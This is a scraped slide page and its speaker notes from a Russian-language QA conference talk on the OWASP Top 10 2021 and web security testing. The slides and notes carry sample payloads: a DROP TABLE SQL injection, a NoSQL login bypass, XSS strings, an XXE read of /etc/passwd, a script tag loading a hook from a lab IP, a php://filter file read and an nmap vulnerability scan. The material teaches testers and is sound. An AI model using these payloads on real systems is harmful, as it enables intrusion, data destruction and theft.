СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021
•Download as PPTX, PDF•
0 likes•79 views
Online QADay 2021 СВЯТ ЛОГИН «OWASP TOP 10 2021» telegram: wwww.t.me/goqameetup fb: www.fb.com/goqaevent fb: www.fb.com/qaday.org linkedin: https://www.linkedin.com/company/goqa/ Сайт: www.qaday.org
Recommended
More Related Content
What's hot
What's hot (20)
Similar to СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021
Similar to СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021 (20)
More from QADay
More from QADay (20)
СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021
- 1. OWASP TOP 10 2021 Свят Логин Head of gangsta QA
- 2. - Head of gangsta QA в - Больше 5 лет тестирую на наличие Web уязвимостей - Больше 9 лет в тестировании - Провожу обучение QA Security testing - Веду блог по Security testing https://svyat.tech - Веду канал в телеге https://t.me/qa_security Свят Логин
- 4. - Про OWASP - 1) Injection - 2) Broken authentication - 3) XSS - 4) Sensitive data exposure - 5) Insecure deserialization + XXE - 6) Broken access control - 7) Insufficient logging & monitoring - 8) SSRF - 9) known vulnerabilities - 10) Security misconfiguration Агенда
- 5. Вступление
- 8. SQL injection A1:Injection Пример сценариев атаки A1:Injection
- 9. Слайд инструкция №1 Search movie select title movie A1:Injection Select title, release, character, genge, IMDb From movie Where title = ‘$title’ search Title Release Character Genre IMDb
- 10. A1:Injection
- 11. NOSql injection Authorization Pass {$ne:’’} A1:Injection Select * From users Where user_name = ‘’ AND password = ‘’ {$ne:’’} Login
- 12. A1:Injection SQL injection Authorization User Pass admin ‘; DROP TABLE users --
- 14. Brute force A2:Broken Authentication email or username Password Authorization User Pass
- 18. Хранимые XSS SEO менеджер Пользователь <img src="http://inexist.ent" onerror="javascript:alert(1)"/> bank.ua A3: XSS
- 19. Причина возникновения XSS <?php if(isset($_POST['btnSign'])) { $message = trim($_POST['mtxMessage']); $name = trim($_POST['txtName']); // Sanitize message input $message = stripslashes($message); $message = mysql_real_escape_string($message); // Sanitize name input $name = mysql_real_escape_string($name); $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');"; $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' ); } ?> A3: XSS <svg/onload=prompt()>
- 21. A3: XSS
- 22. A4: XXE A5:XML External Entities (XXE) User Server <!Entity xxe System “file:///etc/passwd ”> /etc/passwd XML XXE Parser /etc/passwd File system
- 23. Обыкновенный запрос на сервер A4: XXE
- 24. Запрос с использованием уязвимости A4: XXE
- 25. Запрос с использованием уязвимости A4: XXE
- 26. SQL injection A5:Sensitive Data Exposure A5:Sensitive Data Exposure
- 29. SQL injection A6:Broken Access Control A6:Broken Access Control 42%
- 30. SQL i Векторы атаки A6:Broken Access Control Web App Admin User Supervisor Manager User Admin Just User User Supervisor User Manager web_app.com/ admin/ web_app.com/user_info ?user=1
- 38. SSRF 101 A8: SSRF Тех задание: - написать чат - экранировать ссылки - хранить данные на бэке
- 39. Любой ли запрос SSRF? A8: SSRF
- 40. A9:Using Components with Known Vulnerabilities A9:Using Vulnerabilities
- 41. Структура вашего приложения S A9:Using Vulnerabilities WEB APP (Сайт) Сервис корзины 1.1 SQL 1.1 Framework 1.1 Сервис корзины 2.1 SQL 2.1 Framework 2.1 SQL 1.1 Back end 1.1 Frontend 1.1 Back end 2.1 Frontend 2.1 SQL 2.1
- 42. Плагинчик с сканером уязвимостей https://github.com/vulnersCom/nmap-vulners A9:Using Vulnerabilities
- 45. A10:Security Misconfiguration Вектор атаки: Порты UDP Серваки Целевой Сервак 250 ГБ/с 23 мил. пак/сек Memcached
- 46. A6:Security Misconfiguration Вектор атаки: Порты --listen 127.0.0.1 (прослушивание только локального порта) или -U 0(полное отключение UDP)
- 47. Как узнать все ли нормально настроили A6:Security Misconfiguration
Editor's Notes
- https://bugcrowd.com/vulnerability-rating-taxonomy
- https://bugcrowd.com/vulnerability-rating-taxonomy
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
- В случае, если ваш идентификатор украдет злоумышленник, а в системе не были реализованы проверки, скажем IP-адреса сессии, или проверки наличия более одного соединения в одной сессии, злоумышленник сможет получить доступ в систему с правами вашего аккаунта. А если это интернет-банк или кабинет платежной системы, о последствиях такого несанкционированного доступа Вы можете легко догадаться сами. К этой уязвимости можно отнести брут форс, перехват сессии, использование таблица с хешированными данными
- https://haveibeenpwned.com/ https://github.com/danielmiessler/SecLists
- Наверняка многие сталкивались с XSS уязвимостью на каких либо сайтах. Для тех кто не сталкивался, это когда вы заходите на сайт а там поверх него выпрыгивает какой-то попап с информацией не касающегося запрашиваемого сайта. Так сказать своим образом реклама портящая авторитет вашего сайта.
- <script src="http://192.168.123.130:3000/hook.js"></script>
- php://filter/convert.base64-encode/resource=/var/www/bWAPP/admin/settings.php
- .*\.irobot\.com$
- Многие веб-приложения не защищают конфиденциальные данные, такие как кредитные карты и учетные данные для аутентификации. Злоумышленники могут украсть или модифицировать такие слабо защищенные данные для использования в своих корыстных целях. Пример http не шифрование отсутствие хеширования
- admin passwords apps ../ ../../ ../../../
- В 2016 году выявление нарушения потребовало в среднем 191 день
- sudo nmap -sV --script vulners --script-args mincvss=10.0 192.168.1.14
- https://sourceforge.net/projects/metasploitable/files/